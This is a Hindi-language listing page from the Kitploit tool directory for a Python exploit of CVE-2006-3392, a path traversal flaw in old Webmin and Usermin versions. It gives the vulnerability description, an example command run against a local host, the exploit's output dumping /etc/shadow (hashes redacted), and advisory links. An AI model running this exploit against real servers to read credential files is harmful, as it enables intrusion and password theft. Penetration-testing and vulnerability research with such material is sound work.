Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2006-3392 — CVE-2006-3392 के लिए Python एक्सप्लॉइट, Webmin और Usermin में एक पथ ट्रैवर्सल भेद्यता, जो दूरस्थ हमलावरों को एनकोडेड डायरेक्टरी ट्रैवर्सल सीक्वेंस के माध्यम से मनमानी फ़ाइलों को पढ़ने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/brosck/cve-2006-3392
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbrosck/cve-2006-3392

CVE-2006-3392

CVE-2006-3392 के लिए Python एक्सप्लॉइट, Webmin और Usermin में एक पथ ट्रैवर्सल भेद्यता, जो दूरस्थ हमलावरों को एनकोडेड डायरेक्टरी ट्रैवर्सल सीक्वेंस के माध्यम से मनमानी फ़ाइलों को पढ़ने की अनुमति देता है।

रिपॉजिटरी देखें
321 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2006-3392

विवरण

Webmin 1.290 से पहले और Usermin 1.220 से पहले का संस्करण HTML को डिकोड करने से पहले simplify_path फ़ंक्शन को कॉल करता है, जो रिमोट हमलावरों को मनमानी फ़ाइलों को पढ़ने की अनुमति देता है, जैसा कि "..%01" अनुक्रमों का उपयोग करके प्रदर्शित किया गया है, जो "../" अनुक्रमों को हटाने से पहले %01 जैसे बाइट्स को फ़ाइलनाम से हटाए जाने से बच जाता है। नोट: यह CVE-2006-3274 से भिन्न मुद्दा है।

निष्पादन

root@kitploit:~
$ python3 CVE-2006-3392.py -u http://127.0.0.1:10000


   _______      ________    ___   ___   ___    __       ____ ____   ___ ___  
  / ____\ \    / /  ____|  |__ \ / _ \ / _ \  / /      |___ \___ \ / _ \__ \ 
 | |     \ \  / /| |__ ______ ) | | | | | | |/ /_ ______ __) |__) | (_) | ) |
 | |      \ \/ / |  __|______/ /| | | | | | | '_ \______|__ <|__ < \__, |/ / 
 | |____   \  /  | |____    / /_| |_| | |_| | (_) |     ___) |__) |  / // /_ 
  \_____|   \/   |______|  |____|\___/ \___/ \___/     |____/____/  /_/|____|

                              [Coded by Brosck]

[*] File path: /etc/shadow
root:[REDACTED]:17406:0:99999:7:::
daemon:*:17047:0:99999:7:::
bin:*:17047:0:99999:7:::
sys:*:17047:0:99999:7:::
sync:*:17047:0:99999:7:::
games:*:17047:0:99999:7:::
man:*:17047:0:99999:7:::
lp:*:17047:0:99999:7:::
mail:*:17047:0:99999:7:::
news:*:17047:0:99999:7:::
uucp:*:17047:0:99999:7:::
proxy:*:17047:0:99999:7:::
www-data:*:17047:0:99999:7:::
backup:*:17047:0:99999:7:::
list:*:17047:0:99999:7:::
irc:*:17047:0:99999:7:::
gnats:*:17047:0:99999:7:::
nobody:*:17047:0:99999:7:::
libuuid:!:17047:0:99999:7:::
Debian-exim:!:17047:0:99999:7:::
statd:*:17047:0:99999:7:::
sshd:*:17047:0:99999:7:::
mysql:!:17047:0:99999:7:::
proftpd:!:17406:0:99999:7:::
ftp:*:17406:0:99999:7:::
webmaster:[REDACTED]:17406:0:99999:7:::

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2006-3392
  • http://attrition.org/pipermail/vim/2006-July/000923.html
  • http://attrition.org/pipermail/vim/2006-June/000912.html
  • http://secunia.com/advisories/20892
  • http://secunia.com/advisories/21105
  • http://secunia.com/advisories/21365
  • http://secunia.com/advisories/22556
  • http://security.gentoo.org/glsa/glsa-200608-11.xml
  • http://www.debian.org/security/2006/dsa-1199
  • http://www.kb.cert.org/vuls/id/999601
  • http://www.mandriva.com/security/advisories?name=MDKSA-2006:125
  • http://www.osvdb.org/26772
  • http://www.securityfocus.com/archive/1/439653/100/0/threaded
  • http://www.securityfocus.com/archive/1/440125/100/0/threaded
  • http://www.securityfocus.com/archive/1/440466/100/0/threaded
  • http://www.securityfocus.com/archive/1/440493/100/0/threaded
  • http://www.securityfocus.com/bid/18744
  • http://www.vupen.com/english/advisories/2006/2612
  • http://www.webmin.com/changes.html
टूल डाउनलोड करें